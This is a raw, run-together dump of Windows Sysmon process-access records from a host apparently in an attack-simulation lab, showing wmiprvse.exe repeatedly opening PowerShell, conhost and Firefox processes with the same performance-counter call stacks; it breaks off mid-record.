21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150677Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150676Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150675Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150674Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150673Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150672Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150671Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150670Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150669Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150668Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150667Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150666Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150665Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150664Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150663Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150662Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla 